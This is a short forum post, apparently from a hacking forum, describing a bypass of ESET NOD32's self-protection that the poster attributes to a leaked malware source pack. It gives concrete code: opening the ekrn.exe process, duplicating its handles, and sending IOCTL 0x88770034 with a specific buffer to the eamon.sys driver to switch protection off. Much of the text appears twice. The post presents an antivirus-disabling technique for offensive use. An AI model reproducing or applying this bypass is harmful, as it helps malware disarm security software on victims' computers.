Note about Eset SP bypassing,found it in leaked super elite CrapBerp source pack :ugeek:
So,NOD allow to open own processes with this access:
OpenProcess(PROCESS_DUP_HANDLE|PROCESS_QUERY_INFORMATION..)
After opening process {ekrn.exe} they start enuming them handles and duplicate like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles transmitt to function NtDeviceIoControlFile with IOCTL 0x88770034:
function NtDeviceIoControlFile call fastIoDispatch->FastIoDeviceControl of eamon.sys driver.
Seems like that IOCTL 0x88770034 just disable av SP.
So,NOD allow to open own processes with this access:
OpenProcess(PROCESS_DUP_HANDLE|PROCESS_QUERY_INFORMATION..)
After opening process {ekrn.exe} they start enuming them handles and duplicate like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles transmitt to function NtDeviceIoControlFile with IOCTL 0x88770034:
Code: Select all
Okay in case when duplicated hObject == \Device\Eamon UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));
function NtDeviceIoControlFile call fastIoDispatch->FastIoDeviceControl of eamon.sys driver.
Seems like that IOCTL 0x88770034 just disable av SP.
Cause and effect